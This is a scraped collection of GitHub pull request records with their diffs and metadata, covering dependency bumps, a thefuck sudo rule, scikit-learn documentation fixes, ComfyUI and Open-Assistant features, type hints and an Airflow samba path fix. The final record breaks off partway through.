<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.60.0 to 5.60.1 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/206">peter-evans/find-comment#206</a></li>
<li>build(deps-dev): bump eslint from 8.43.0 to 8.44.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/207">peter-evans/find-comment#207</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.60.0 to 5.60.1 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/208">peter-evans/find-comment#208</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.60.1 to 5.61.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/209">peter-evans/find-comment#209</a></li>
<li>build(deps): bump tough-cookie from 4.1.2 to 4.1.3 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/211">peter-evans/find-comment#211</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.60.1 to 5.61.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/210">peter-evans/find-comment#210</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.61.0 to 5.62.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/212">peter-evans/find-comment#212</a></li>
<li>build(deps-dev): bump eslint from 8.44.0 to 8.45.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/214">peter-evans/find-comment#214</a></li>
<li>build(deps-dev): bump eslint-plugin-jest from 27.2.2 to 27.2.3 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/215">peter-evans/find-comment#215</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.61.0 to 5.62.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/213">peter-evans/find-comment#213</a></li>
<li>build(deps-dev): bump eslint-plugin-github from 4.8.0 to 4.9.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/216">peter-evans/find-comment#216</a></li>
<li>build(deps-dev): bump word-wrap from 1.2.3 to 1.2.4 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/217">peter-evans/find-comment#217</a></li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/peter-evans/find-comment/commit/d5fe37641ad8451bdd80312415672ba26c86575e"><code>d5fe376</code></a> feat: update runtime to node 20 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/282">#282</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/e3754082ec6536fb0f8c4c6ebb4c2682cf6efa67"><code>e375408</code></a> build(deps-dev): bump <code>@types/node</code> from 18.19.6 to 18.19.8 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/279">#279</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/6f781399d61362a4f5121bab933bbad888ecd659"><code>6f78139</code></a> build(deps-dev): bump prettier from 3.2.1 to 3.2.4 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/278">#278</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/663f5b8fd865055f01a344810af292dd4b5f0d5b"><code>663f5b8</code></a> build(deps-dev): bump eslint-plugin-jest from 27.6.1 to 27.6.3 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/276">#276</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/1950d4859087e02b21eefc8ad70c114702f3daba"><code>1950d48</code></a> build(deps-dev): bump prettier from 3.1.1 to 3.2.1 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/277">#277</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/4c49b27bc3472947b5de8b4ed6732a81960286a8"><code>4c49b27</code></a> build(deps-dev): bump eslint-plugin-prettier from 5.1.2 to 5.1.3 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/275">#275</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/141f79c0a836a288f9e9108fa5fb9128b0166869"><code>141f79c</code></a> build(deps-dev): bump <code>@types/node</code> from 18.19.4 to 18.19.6 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/274">#274</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/90d027df0ed038f7d73baa358f32756bececd141"><code>90d027d</code></a> build(deps-dev): bump eslint-plugin-jest from 27.6.0 to 27.6.1 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/273">#273</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/4541d1b6b0e618acc24284e118743fc5ad0bc5de"><code>4541d1b</code></a> build(deps-dev): bump eslint-plugin-prettier from 5.1.1 to 5.1.2 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/272">#272</a>)</li>
<li><a href="https://github.com/peter-evans/find-comment/commit/3e2c601e8c32795632a106e9c0ae030f1699756e"><code>3e2c601</code></a> build(deps-dev): bump <code>@types/node</code> from 18.19.3 to 18.19.4 (<a href="https://redirect.github.com/peter-evans/find-comment/issues/271">#271</a>)</li>
<li>Additional commits viewable in <a href="https://github.com/peter-evans/find-comment/compare/a54c31d7fa095754bfef525c0c8e5e5674c4b4b1...d5fe37641ad8451bdd80312415672ba26c86575e">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details> | https://api.github.com/repos/psf/black/pulls/4190 | 2024-01-29T06:45:58Z | 2024-01-29T16:27:21Z | 2024-01-29T16:27:21Z | 2024-01-29T16:27:22Z | 207 | psf/black | 24,377 |
Add sudo rule for Aura | diff --git a/thefuck/rules/sudo.py b/thefuck/rules/sudo.py
index fd745661c..91e5f4bbc 100644
--- a/thefuck/rules/sudo.py
+++ b/thefuck/rules/sudo.py
@@ -19,7 +19,8 @@
'you don\'t have access to the history db.',
'authentication is required',
'edspermissionerror',
- 'you don\'t have write permissions']
+ 'you don\'t have write permissions',
+ 'use `sudo`']
def match(command):
When installing from the Arch User Repository without root:
aura >>= You have to use `sudo` for that.
This PR adds the slightly more general, but unambiguous, "use `sudo`".
It might be helpful to also add "use sudo" (no backticks) - but I haven't since I don't know for sure it's in use.
Closes #543.
| https://api.github.com/repos/nvbn/thefuck/pulls/557 | 2016-09-30T19:35:56Z | 2016-10-02T15:21:05Z | 2016-10-02T15:21:04Z | 2016-10-03T22:17:43Z | 127 | nvbn/thefuck | 30,621 |
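The matching logic behind this rule can be sketched standalone. This is a simplification: the real thefuck rule operates on a command object and uses the full `patterns` list from the diff, whereas the list and `match` signature below are illustrative:

```python
ERROR_PATTERNS = [
    "permission denied",
    "you don't have write permissions",
    "use `sudo`",  # the phrase this PR adds
]

def match(output):
    # The rule fires when any known error phrase appears in the
    # lowercased command output.
    lowered = output.lower()
    return any(pattern in lowered for pattern in ERROR_PATTERNS)

print(match("aura >>= You have to use `sudo` for that."))  # True
```

Because matching is case-insensitive substring search, the backticked "use `sudo`" phrase catches Aura's message without also matching unrelated output that merely mentions sudo.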
DOC minor doc fixes for sphinx. | diff --git a/doc/modules/linear_model.rst b/doc/modules/linear_model.rst
index 0293cc04a997a..7e7e76077926c 100644
--- a/doc/modules/linear_model.rst
+++ b/doc/modules/linear_model.rst
@@ -754,7 +754,7 @@ For large dataset, you may also consider using :class:`SGDClassifier` with 'log'
* :ref:`sphx_glr_auto_examples_linear_model_plot_logistic_path.py`
- * :ref:`example_linear_model_plot_logistic_multinomial.py`
+ * :ref:`sphx_glr_auto_examples_linear_model_plot_logistic_multinomial.py`
.. _liblinear_differences:
@@ -1118,7 +1118,7 @@ in the following ways.
.. topic:: Examples:
- * :ref:`example_linear_model_plot_huber_vs_ridge.py`
+ * :ref:`sphx_glr_auto_examples_linear_model_plot_huber_vs_ridge.py`
.. topic:: References:
diff --git a/doc/modules/mixture.rst b/doc/modules/mixture.rst
index 5e3c2c448de7c..cf9c3ea7e7e5a 100644
--- a/doc/modules/mixture.rst
+++ b/doc/modules/mixture.rst
@@ -175,7 +175,7 @@ points.
.. topic:: Examples:
- * See :ref:`plot_bayesian_gaussian_mixture.py` for a comparaison of
+ * See :ref:`sphx_glr_auto_examples_plot_bayesian_gaussian_mixture.py` for a comparaison of
the results of the ``BayesianGaussianMixture`` for different values
of the parameter ``dirichlet_concentration_prior``.
@@ -190,10 +190,10 @@ Pros
expectation-maximization solutions.
:Automatic selection: when `dirichlet_concentration_prior` is small enough and
-`n_components` is larger than what is found necessary by the model, the
-Variational Bayesian mixture model has a natural tendency to set some mixture
-weights values close to zero. This makes it possible to let the model choose a
-suitable number of effective components automatically.
+ `n_components` is larger than what is found necessary by the model, the
+ Variational Bayesian mixture model has a natural tendency to set some mixture
+ weights values close to zero. This makes it possible to let the model choose a
+ suitable number of effective components automatically.
Cons
.....
diff --git a/doc/modules/model_evaluation.rst b/doc/modules/model_evaluation.rst
index 1abec9a49184c..690e85f9150bf 100644
--- a/doc/modules/model_evaluation.rst
+++ b/doc/modules/model_evaluation.rst
@@ -1083,7 +1083,7 @@ Here is a small example of usage of this function:::
.. topic:: Example:
- * See :ref:`example_calibration_plot_calibration.py`
+ * See :ref:`sphx_glr_calibration_plot_calibration.py`
for an example of Brier score loss usage to perform probability
calibration of classifiers.
diff --git a/doc/testimonials/testimonials.rst b/doc/testimonials/testimonials.rst
index 0355ca36f539b..5c0ac1b306b59 100644
--- a/doc/testimonials/testimonials.rst
+++ b/doc/testimonials/testimonials.rst
@@ -292,7 +292,9 @@ Greg Lamp, Co-founder Yhat
.. raw:: html
</span>
-------------------------------------------
+
+`Rangespan <https://www.rangespan.com>_`
+----------------------------------------
.. raw:: html
diff --git a/doc/tutorial/statistical_inference/finding_help.rst b/doc/tutorial/statistical_inference/finding_help.rst
index 9d73929fa72d1..9d2c0d48e3074 100644
--- a/doc/tutorial/statistical_inference/finding_help.rst
+++ b/doc/tutorial/statistical_inference/finding_help.rst
@@ -19,9 +19,6 @@ Q&A communities with Machine Learning practitioners
also features some interesting discussions:
https://www.quora.com/topic/Machine-Learning
- Have a look at the best questions section, eg: `What are some
- good resources for learning about machine learning`_.
-
:Stack Exchange:
The Stack Exchange family of sites hosts `multiple subdomains for Machine Learning questions`_.
diff --git a/doc/whats_new.rst b/doc/whats_new.rst
index b5611d07b1a0e..220920b715f22 100644
--- a/doc/whats_new.rst
+++ b/doc/whats_new.rst
@@ -290,7 +290,7 @@ Enhancements
- Added support for substituting or disabling :class:`pipeline.Pipeline`
and :class:`pipeline.FeatureUnion` components using the ``set_params``
interface that powers :mod:`sklearn.grid_search`.
- See :ref:`example_plot_compare_reduction.py`. By `Joel Nothman`_ and
+ See :ref:`sphx_glr_plot_compare_reduction.py`. By `Joel Nothman`_ and
`Robert McGibbon`_.
Bug fixes
@@ -385,7 +385,7 @@ Bug fixes
Oliveira <https://github.com/caioaao>`_.
- Fix :class:`linear_model.ElasticNet` sparse decision function to match
- output with dense in the multioutput case.
+ output with dense in the multioutput case.
API changes summary
-------------------
@@ -4458,3 +4458,5 @@ David Huard, Dave Morrill, Ed Schofield, Travis Oliphant, Pearu Peterson.
.. _Mads Jensen: https://github.com/indianajensen
.. _Sebastián Vanrell: https://github.com/srvanrell
+
+.. _Robert McGibbon: https://github.com/rmcgibbo
diff --git a/sklearn/datasets/descr/breast_cancer.rst b/sklearn/datasets/descr/breast_cancer.rst
index 8e12472941a66..547b41021ef2f 100644
--- a/sklearn/datasets/descr/breast_cancer.rst
+++ b/sklearn/datasets/descr/breast_cancer.rst
@@ -30,6 +30,7 @@ Data Set Characteristics:
- WDBC-Benign
:Summary Statistics:
+
===================================== ====== ======
Min Max
===================================== ====== ======
diff --git a/sklearn/decomposition/kernel_pca.py b/sklearn/decomposition/kernel_pca.py
index bc429f85890da..fdd1f852c6af3 100644
--- a/sklearn/decomposition/kernel_pca.py
+++ b/sklearn/decomposition/kernel_pca.py
@@ -100,7 +100,7 @@ class KernelPCA(BaseEstimator, TransformerMixin):
dual_coef_ : array, (n_samples, n_features)
Inverse transform matrix. If `fit_inverse_transform=False`,
- dual_coef_ is not present.
+ ``dual_coef_`` is not present.
X_transformed_fit_ : array, (n_samples, n_components)
Projection of the fitted data on the kernel principal components.
diff --git a/sklearn/decomposition/pca.py b/sklearn/decomposition/pca.py
index 881a4a593cfd2..aecab027b7db8 100644
--- a/sklearn/decomposition/pca.py
+++ b/sklearn/decomposition/pca.py
@@ -183,7 +183,7 @@ class PCA(_BasePCA):
components_ : array, [n_components, n_features]
Principal axes in feature space, representing the directions of
maximum variance in the data. The components are sorted by
- explained_variance_.
+ ``explained_variance_``.
explained_variance_ : array, [n_components]
The amount of variance explained by each of the selected components.
@@ -514,7 +514,7 @@ def score(self, X, y=None):
@deprecated("RandomizedPCA was deprecated in 0.18 and will be removed in 0.20. "
"Use PCA(svd_solver='randomized') instead. The new implementation "
- "DOES NOT store whiten components_. Apply transform to get them.")
+ "DOES NOT store whiten ``components_``. Apply transform to get them.")
class RandomizedPCA(BaseEstimator, TransformerMixin):
"""Principal component analysis (PCA) using randomized SVD
diff --git a/sklearn/multioutput.py b/sklearn/multioutput.py
index f8393d74c3273..e650bff25b580 100644
--- a/sklearn/multioutput.py
+++ b/sklearn/multioutput.py
@@ -147,8 +147,8 @@ def score(self, X, y, sample_weight=None):
predicts the expected value of y, disregarding the input features,
would get a R^2 score of 0.0.
- Note
- ----
+ Notes
+ -----
R^2 is calculated by weighting all the targets equally using
`multioutput='uniform_average'`.
diff --git a/sklearn/preprocessing/data.py b/sklearn/preprocessing/data.py
index 1c3d8db580272..e7f242cdedc5d 100644
--- a/sklearn/preprocessing/data.py
+++ b/sklearn/preprocessing/data.py
@@ -933,7 +933,7 @@ class RobustScaler(BaseEstimator, TransformerMixin):
quantile_range : tuple (q_min, q_max), 0.0 < q_min < q_max < 100.0
Default: (25.0, 75.0) = (1st quantile, 3rd quantile) = IQR
- Quantile range used to calculate scale_
+ Quantile range used to calculate ``scale_``.
.. versionadded:: 0.18
@@ -1101,7 +1101,7 @@ def robust_scale(X, axis=0, with_centering=True, with_scaling=True,
quantile_range : tuple (q_min, q_max), 0.0 < q_min < q_max < 100.0
Default: (25.0, 75.0) = (1st quantile, 3rd quantile) = IQR
- Quantile range used to calculate scale_
+ Quantile range used to calculate ``scale_``.
.. versionadded:: 0.18
| What it says on the label.
| https://api.github.com/repos/scikit-learn/scikit-learn/pulls/7357 | 2016-09-07T21:59:47Z | 2016-09-08T00:07:40Z | 2016-09-08T00:07:40Z | 2016-09-08T14:57:29Z | 2,379 | scikit-learn/scikit-learn | 46,597 |
Editattention setting | diff --git a/web/extensions/core/editAttention.js b/web/extensions/core/editAttention.js
index fe395c3cac..d124a3b725 100644
--- a/web/extensions/core/editAttention.js
+++ b/web/extensions/core/editAttention.js
@@ -2,10 +2,21 @@ import { app } from "/scripts/app.js";
// Allows you to edit the attention weight by holding ctrl (or cmd) and using the up/down arrow keys
-const id = "Comfy.EditAttention";
app.registerExtension({
-name:id,
+ name: "Comfy.EditAttention",
init() {
+ const editAttentionDelta = app.ui.settings.addSetting({
+ id: "Comfy.EditAttention.Delta",
+ name: "Ctrl+up/down precision",
+ type: "slider",
+ attrs: {
+ min: 0.01,
+ max: 2,
+ step: 0.01,
+ },
+ defaultValue: 0.1,
+ });
+
function incrementWeight(weight, delta) {
const floatWeight = parseFloat(weight);
if (isNaN(floatWeight)) return weight;
@@ -58,7 +69,7 @@ name:id,
function editAttention(event) {
const inputField = event.composedPath()[0];
- const delta = 0.025;
+ const delta = parseFloat(editAttentionDelta.value);
if (inputField.tagName !== "TEXTAREA") return;
if (!(event.key === "ArrowUp" || event.key === "ArrowDown")) return;
@@ -107,7 +118,7 @@ name:id,
// Increment the weight
const weightDelta = event.key === "ArrowUp" ? delta : -delta;
const updatedText = selectedText.replace(/(.*:)(\d+(\.\d+)?)(.*)/, (match, prefix, weight, _, suffix) => {
- return prefix + incrementWeight(weight, weightDelta) + suffix;
+ return prefix + incrementWeight(weight, weightDelta) + suffix;
});
inputField.setRangeText(updatedText, start, end, "select");
| Defaults to `0.1`.
 | https://api.github.com/repos/comfyanonymous/ComfyUI/pulls/533 | 2023-04-18T00:48:56Z | 2023-04-18T06:22:05Z | 2023-04-18T06:22:05Z | 2023-04-18T07:11:53Z | 454 | comfyanonymous/ComfyUI | 17,960 |
[MRG] DOC Fix Documentation in develop.rst | diff --git a/doc/developers/develop.rst b/doc/developers/develop.rst
index 186040b32ebd8..53dd0ca47824d 100644
--- a/doc/developers/develop.rst
+++ b/doc/developers/develop.rst
@@ -696,6 +696,7 @@ The following example should make this clear::
def __init__(self, n_components=100, random_state=None):
self.random_state = random_state
+ self.n_components = n_components
# the arguments are ignored anyway, so we make them optional
def fit(self, X=None, y=None):
@@ -703,7 +704,7 @@ The following example should make this clear::
def transform(self, X):
n_samples = X.shape[0]
- return self.random_state_.randn(n_samples, n_components)
+ return self.random_state_.randn(n_samples, self.n_components)
The reason for this setup is reproducibility:
when an estimator is ``fit`` twice to the same data,
| The example at the bottom of the develop page crashes when executed. A parameter is passed to the constructor, but never added to the object, yet referenced in one of its methods. I simply added the parameter to the object and updated its reference.
--------
This is my first contribution, heard on the Banana Data Podcast that even small PR's are welcome and it's best to start with documentation. So here you go :smile: | https://api.github.com/repos/scikit-learn/scikit-learn/pulls/17613 | 2020-06-16T18:03:37Z | 2020-06-16T18:11:58Z | 2020-06-16T18:11:58Z | 2020-06-16T18:13:07Z | 229 | scikit-learn/scikit-learn | 46,699 |
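The pattern corrected in the diff above can be run end-to-end roughly as follows. This is an illustrative stdlib-only sketch, not the actual scikit-learn example: the class name `GaussianNoiseTransformer` is invented here, and `random.Random` stands in for numpy and scikit-learn's `check_random_state` helper. What it shows is the convention the fix restores: every `__init__` argument is stored on `self`, and derived state lives on a fit attribute.

```python
import random

class GaussianNoiseTransformer:
    """Illustrative sketch of the corrected pattern: __init__ only stores
    its arguments; the seeded RNG is created in fit for reproducibility."""

    def __init__(self, n_components=100, random_state=None):
        self.random_state = random_state
        self.n_components = n_components  # the line the PR adds

    def fit(self, X=None, y=None):
        # derived state goes on a trailing-underscore fit attribute
        self.random_state_ = random.Random(self.random_state)
        return self

    def transform(self, X):
        n_samples = len(X)
        # uses self.n_components, mirroring the second hunk of the diff
        return [[self.random_state_.gauss(0, 1)
                 for _ in range(self.n_components)]
                for _ in range(n_samples)]

t = GaussianNoiseTransformer(n_components=3, random_state=0).fit()
out = t.transform([[1], [2]])
print(len(out), len(out[0]))  # 2 3
```

Fitting twice with the same `random_state` reproduces the same output, which is the reproducibility rationale the surrounding develop.rst text gives for this setup.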
add type hints to binary_search.py script | diff --git a/coding/python/binary_search.py b/coding/python/binary_search.py
index c8186aea1..168d10b42 100644
--- a/coding/python/binary_search.py
+++ b/coding/python/binary_search.py
@@ -1,14 +1,15 @@
#!/usr/bin/env python
import random
+from typing import List
-def binary_search(arr, lb, ub, target):
+def binary_search(arr: List[int], lb: int, ub: int, target: int) -> int:
"""
A Binary Search Example which has O(log n) time complexity.
"""
if lb <= ub:
- mid = ub + lb // 2
+ mid: int = ub + lb // 2
if arr[mid] == target:
return mid
elif arr[mid] < target:
@@ -20,8 +21,8 @@ def binary_search(arr, lb, ub, target):
if __name__ == '__main__':
- rand_num_li = sorted([random.randint(1, 50) for _ in range(10)])
- target = random.randint(1, 50)
+ rand_num_li: List[int] = sorted([random.randint(1, 50) for _ in range(10)])
+ target: int = random.randint(1, 50)
print("List: {}\nTarget: {}\nIndex: {}".format(
rand_num_li, target,
binary_search(rand_num_li, 0, len(rand_num_li) - 1, target)))
| Type hints have been supported in Python since version 3.5.
They help the client in using the function appropriately. | https://api.github.com/repos/bregman-arie/devops-exercises/pulls/222 | 2022-04-25T22:57:54Z | 2022-04-26T04:36:58Z | 2022-04-26T04:36:58Z | 2022-04-26T04:36:58Z | 337 | bregman-arie/devops-exercises | 17,611 |
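As an aside unrelated to the type-hint change itself, the midpoint expression kept in the diff above depends on operator precedence: in Python `//` binds tighter than `+`, so `ub + lb // 2` parses as `ub + (lb // 2)` rather than the conventional `(ub + lb) // 2`. A quick illustrative check:

```python
# Purely illustrative: // binds tighter than +, so the midpoint
# expression shown in the diff computes ub + (lb // 2).
lb, ub = 0, 9

mid_as_written = ub + lb // 2    # 9 + (0 // 2) = 9
mid_intended = (ub + lb) // 2    # 4, the conventional midpoint

print(mid_as_written, mid_intended)  # 9 4
```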
inference: allow user change chat title | diff --git a/inference/full-dev-setup.sh b/inference/full-dev-setup.sh
index 4a6a10cada..1c73e1de39 100755
--- a/inference/full-dev-setup.sh
+++ b/inference/full-dev-setup.sh
@@ -30,7 +30,7 @@ fi
tmux split-window -h
tmux send-keys "cd server" C-m
-tmux send-keys "LOGURU_LEVEL=$LOGLEVEL POSTGRES_PORT=5732 REDIS_PORT=6779 DEBUG_API_KEYS='0000,0001' ALLOW_DEBUG_AUTH=True uvicorn main:app" C-m
+tmux send-keys "LOGURU_LEVEL=$LOGLEVEL POSTGRES_PORT=5732 REDIS_PORT=6779 DEBUG_API_KEYS='0000,0001' ALLOW_DEBUG_AUTH=True TRUSTED_CLIENT_KEYS=6969 uvicorn main:app" C-m
tmux split-window -h
tmux send-keys "cd text-client" C-m
tmux send-keys "sleep 5" C-m
diff --git a/inference/server/oasst_inference_server/routes/chats.py b/inference/server/oasst_inference_server/routes/chats.py
index 15b4923e13..d3b96ff567 100644
--- a/inference/server/oasst_inference_server/routes/chats.py
+++ b/inference/server/oasst_inference_server/routes/chats.py
@@ -256,3 +256,17 @@ async def handle_create_report(
except Exception:
logger.exception("Error adding report")
return fastapi.Response(status_code=500)
+
+
+@router.put("/{chat_id}/title")
+async def handle_update_title(
+ chat_id: str,
+ request: chat_schema.ChatUpdateTitleRequest,
+ ucr: deps.UserChatRepository = fastapi.Depends(deps.create_user_chat_repository),
+) -> fastapi.Response:
+ """Allows the client to update a chat title."""
+ try:
+ await ucr.update_title(chat_id=chat_id, title=request.title)
+ except Exception:
+ logger.exception("Error when updating chat title")
+ return fastapi.Response(status_code=500)
diff --git a/inference/server/oasst_inference_server/schemas/chat.py b/inference/server/oasst_inference_server/schemas/chat.py
index 42bbd2f071..ae70bf4b71 100644
--- a/inference/server/oasst_inference_server/schemas/chat.py
+++ b/inference/server/oasst_inference_server/schemas/chat.py
@@ -81,3 +81,7 @@ class MessageTimeoutException(Exception):
def __init__(self, message: inference.MessageRead):
super().__init__(f"Message {message.id} timed out")
self.message = message
+
+
+class ChatUpdateTitleRequest(pydantic.BaseModel):
+ title: pydantic.constr(max_length=100)
diff --git a/inference/server/oasst_inference_server/user_chat_repository.py b/inference/server/oasst_inference_server/user_chat_repository.py
index 8e4bf33e92..6f9df15319 100644
--- a/inference/server/oasst_inference_server/user_chat_repository.py
+++ b/inference/server/oasst_inference_server/user_chat_repository.py
@@ -20,17 +20,16 @@ async def get_chats(self) -> list[models.DbChat]:
query = query.order_by(models.DbChat.created_at.desc())
return (await self.session.exec(query)).all()
- async def get_chat_by_id(self, chat_id: str) -> models.DbChat:
- query = (
- sqlmodel.select(models.DbChat)
- .options(
+ async def get_chat_by_id(self, chat_id: str, include_messages: bool = True) -> models.DbChat:
+ query = sqlmodel.select(models.DbChat).where(
+ models.DbChat.id == chat_id,
+ models.DbChat.user_id == self.user_id,
+ )
+ if include_messages:
+ query = query.options(
sqlalchemy.orm.selectinload(models.DbChat.messages).selectinload(models.DbMessage.reports),
)
- .where(
- models.DbChat.id == chat_id,
- models.DbChat.user_id == self.user_id,
- )
- )
+
chat = (await self.session.exec(query)).one()
return chat
@@ -226,3 +225,10 @@ async def add_report(self, message_id: str, reason: str, report_type: inference.
await self.session.commit()
await self.session.refresh(report)
return report
+
+ async def update_title(self, chat_id: str, title: str) -> models.DbChat:
+ logger.info(f"Updating title of chat {chat_id=}: {title=}")
+ chat = await self.get_chat_by_id(chat_id=chat_id, include_messages=False)
+
+ chat.title = title
+ await self.session.commit()
| https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/2496 | 2023-04-13T08:36:46Z | 2023-04-13T09:08:16Z | 2023-04-13T09:08:16Z | 2023-04-13T09:08:17Z | 1,074 | LAION-AI/Open-Assistant | 37,774 | |
Handle leading slash in samba path | diff --git a/airflow/providers/samba/hooks/samba.py b/airflow/providers/samba/hooks/samba.py
index 7f846e351b10c..df46c0cf3489a 100644
--- a/airflow/providers/samba/hooks/samba.py
+++ b/airflow/providers/samba/hooks/samba.py
@@ -80,7 +80,7 @@ def __exit__(self, exc_type, exc_value, traceback):
self._connection_cache.clear()
def _join_path(self, path):
- return f"//{posixpath.join(self._host, self._share, path)}"
+ return f"//{posixpath.join(self._host, self._share, path.lstrip('/'))}"
@wraps(smbclient.link)
def link(self, src, dst, follow_symlinks=True):
diff --git a/tests/providers/samba/hooks/test_samba.py b/tests/providers/samba/hooks/test_samba.py
index 4fb36d8ca9f94..a2c45a829c973 100644
--- a/tests/providers/samba/hooks/test_samba.py
+++ b/tests/providers/samba/hooks/test_samba.py
@@ -130,3 +130,15 @@ def test_method(self, name, get_conn_mock):
# We expect keyword arguments to include the connection settings.
assert dict(kwargs, **connection_settings) == p_kwargs
+
+ @parameterized.expand(
+ [
+ ("/start/path/with/slash", "//ip/share/start/path/with/slash"),
+ ("start/path/without/slash", "//ip/share/start/path/without/slash"),
+ ],
+ )
+ @mock.patch('airflow.hooks.base.BaseHook.get_connection')
+ def test__join_path(self, path, full_path, get_conn_mock):
+ get_conn_mock.return_value = CONNECTION
+ hook = SambaHook('samba_default')
+ assert hook._join_path(path) == full_path
| Fix an issue where, if the path to a file on a samba share has a
slash prepended to it, the `SambaHook` will treat the path as the
host, likely resulting in an attempt to connect to the wrong samba host.
For example, this code:
```
hook = SambaHook('samba_test')
hook.push_from_local(
"/Sales/TestData/sometestfile.txt",
"/tmp/somefile",
)
```
resulted in:
```
airflow/providers/samba/hooks/samba.py:246: in push_from_local
with open(local_filepath, "rb") as f, self.open_file(destination_filepath, mode="wb") as g:
airflow/providers/samba/hooks/samba.py:135: in open_file
**self._conn_kwargs,
/usr/local/lib/python3.6/site-packages/smbclient/_os.py:370: in open_file
file_attributes=file_attributes, **kwargs)
/usr/local/lib/python3.6/site-packages/smbclient/_io.py:374: in __init__
tree, fd_path = get_smb_tree(path, **kwargs)
/usr/local/lib/python3.6/site-packages/smbclient/_pool.py:301: in get_smb_tree
auth_protocol=auth_protocol)
/usr/local/lib/python3.6/site-packages/smbclient/_pool.py:358: in register_session
connection.connect(timeout=connection_timeout)
/usr/local/lib/python3.6/site-packages/smbprotocol/connection.py:719: in connect
self.transport.connect()
/usr/local/lib/python3.6/site-packages/smbprotocol/transport.py:74: ValueError
ValueError: Failed to connect to 'Sales:445': [Errno -2] Name or service not known
```
<!--
Thank you for contributing! Please make sure that your code changes
are covered with tests. And in case of new features or big changes
remember to adjust the documentation.
Feel free to ping committers for the review!
In case of existing issue, reference it using one of the following:
closes: #ISSUE
related: #ISSUE
How to write a good git commit message:
http://chris.beams.io/posts/git-commit/
-->
---
**^ Add meaningful description above**
Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/CONTRIBUTING.rst#pull-request-guidelines)** for more information.
In case of fundamental code change, Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)) is needed.
In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
In case of backwards incompatible changes please leave a note in [UPDATING.md](https://github.com/apache/airflow/blob/main/UPDATING.md).
| https://api.github.com/repos/apache/airflow/pulls/18847 | 2021-10-09T01:10:28Z | 2021-10-09T15:38:17Z | 2021-10-09T15:38:17Z | 2021-10-09T15:38:17Z | 431 | apache/airflow | 14,466 |
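The one-line fix in the diff above works because `posixpath.join`, like `os.path.join`, discards all preceding components when it encounters an absolute component. A minimal demonstration with the same `host`/`share` layout as the test case:

```python
import posixpath

host, share = "ip", "share"

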